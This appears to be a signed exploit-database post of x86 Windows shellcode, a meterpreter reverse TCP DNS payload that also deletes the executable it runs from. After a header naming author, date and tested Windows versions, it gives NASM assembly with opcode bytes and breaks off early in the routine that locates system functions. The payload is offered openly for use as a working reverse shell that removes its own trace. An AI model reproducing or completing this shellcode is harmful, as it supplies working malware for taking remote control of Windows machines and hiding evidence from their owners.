-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ; Exploit Title: x86 windows shellcode - meterpreter/windows/reverse_tcp_dns_selfdel ; Date: Sun Nov 13 11:12:03 GMT 2016 ; Exploit Author: Fugu ; Vendor Homepage: www.microsoft.com ; Version: all win ; Tested on: Windows 7(x86)X, 8.1(x86), 10(x86_64) ; Note: This is a standard meterpreter/windows/reverse_tcp_dns ; with a little bonus, it will remove the exe that it ; gets injected/compiled into. ; Warning: Do not run this from powershell.exe or any ; other system file exe, cause theres a chance ; it will be erased forever. As is, no warranties. section .bss section .data section .text global _start _start: cld ; 00000000 FC |.| call dword loc_88h ; 00000001 E882000000 |.....| pushad ; 00000006 60 |`| mov ebp,esp ; 00000007 89E5 |..| xor eax,eax ; 00000009 31C0 |1.| mov edx,[fs:eax+0x30] ; 0000000B 648B5030 |d.P0| mov edx,[edx+0xc] ; 0000000F 8B520C |.R.| mov edx,[edx+0x14] ; 00000012 8B5214 |.R.| loc_15h: mov esi,[edx+0x28] ; 00000015 8B7228 |.r(| movzx ecx,word [edx+0x26] ; 00000018 0FB74A26 |..J&| xor edi,edi ; 0000001C 31FF |1.| loc_1eh: lodsb ; 0000001E AC |.| cmp al,0x61 ; 0000001F 3C61 |